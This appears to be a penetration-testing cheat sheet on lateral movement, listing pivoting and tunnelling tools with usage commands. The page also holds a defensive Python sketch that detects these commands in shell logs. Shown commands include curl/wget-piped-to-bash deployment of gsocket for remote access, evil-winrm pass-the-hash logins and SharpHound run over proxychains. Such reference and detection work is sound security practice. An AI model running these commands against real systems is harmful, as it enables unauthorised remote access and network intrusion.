# Lateral Movement

[**Neo-reGeorg**](https://github.com/L-codes/Neo-reGeorg): The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

[**Tunna**](https://github.com/SECFORCE/Tunna): Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

[**pivotnacci**](https://github.com/blackarrowsec/pivotnacci)**:** Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP `agents`. The architecture looks like the following:

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MYJfpYKwg7XOzVAS4gJ%2F-MYKe391DPjhNuDFPf3r%2Fimage.png?alt=media\&token=9bee3717-27d1-4941-b0d4-d2d1140171b1)

[**ngrok**](https://ngrok.com/): Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.

[**gsocket**](https://github.com/hackerschoice/gsocket)**:** The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.

Use either one of these two commands to *deploy*:

```
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MZ91ivqpwG5buDAk1y4%2F-MZ9NPDjsl7MZ_phLOd_%2Fimage.png?alt=media\&token=b8852f55-040f-4629-b26f-fbdae591ecb0)

Use either one of these two commands to *uninstall*:

```
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
```

Access the remote host from anywhere in the world:

```
$ gs-netcat -s ExampleSecretChangeMe -i
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MZ91ivqpwG5buDAk1y4%2F-MZ9NRYvSTcsxKTESBHa%2Fimage.png?alt=media\&token=10c75dfc-ea7b-4ece-90b5-d347a4cd14b1)

{% embed url="<https://youtu.be/tmf9VGDPILE>" %}

{% embed url="<https://www.gsocket.io/deploy/>" %}
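On the defending side, the gsocket deploy, uninstall and `gs-netcat` commands above leave recognisable strings in shell history and command-line audit logs. The following Python sketch is an added example (not part of the original page or the gsocket project) that flags them; the log format, rule names and the `scan`/`redact` helpers are assumptions made for illustration, and the sample lines are constructed.

```python
import re

# Rules derived from the command strings shown on this page (rule names are hypothetical).
RULES = {
    # bash -c "$(curl ...)" / sh -c "$(wget ...)": remote script fetched straight into a shell
    "fetch-piped-to-shell": re.compile(r"\b(?:ba)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
    # the installer URL used by both deploy one-liners
    "gsocket-installer-url": re.compile(r"\bgsocket\.io/x\b"),
    # the uninstall variant sets this variable before the same one-liner
    "gsocket-uninstall": re.compile(r"\bGS_UNDO=1\b"),
    # gs-netcat started with its shared secret on the command line
    "gs-netcat-with-secret": re.compile(r"\bgs-netcat\b(?=.*\s-s\s+\S+)"),
}

# The value after -s is a credential: keep it out of alerts and tickets.
SECRET = re.compile(r"(\bgs-netcat\b.*?\s-s\s+)(\S+)")


def redact(cmdline):
    """Replace the gs-netcat secret with a placeholder."""
    return SECRET.sub(r"\1<redacted>", cmdline)


def scan(lines):
    """Return (line_number, matched_rule_names, redacted_line) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        matched = sorted(name for name, rx in RULES.items() if rx.search(line))
        if matched:
            hits.append((n, matched, redact(line)))
    return hits


# Constructed sample: shell-history style lines, not real telemetry.
SAMPLE = [
    'uid=1000 cmd=bash -c "$(curl -fsSL gsocket.io/x)"',
    'uid=1000 cmd=apt-get install -y curl',
    'uid=0 cmd=GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"',
    'uid=1000 cmd=gs-netcat -s ConstructedSecret123 -i',
    'uid=1000 cmd=curl -fsSL https://example.com/index.html',
]

if __name__ == "__main__":
    for lineno, rules, text in scan(SAMPLE):
        print(f"line {lineno}: {', '.join(rules)} :: {text}")
```

String matching of this kind only catches unmodified invocations, so treat hits as leads to correlate with outbound connection logs rather than as complete coverage.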

[**evil-winrm**](https://github.com/Hackplayers/evil-winrm)**:** This shell is the ultimate WinRM shell for hacking/pentesting.

```
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd'
```

**proxychains windows**

```
.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All
```

{% embed url="<https://github.com/shunf4/proxychains-windows>" %}
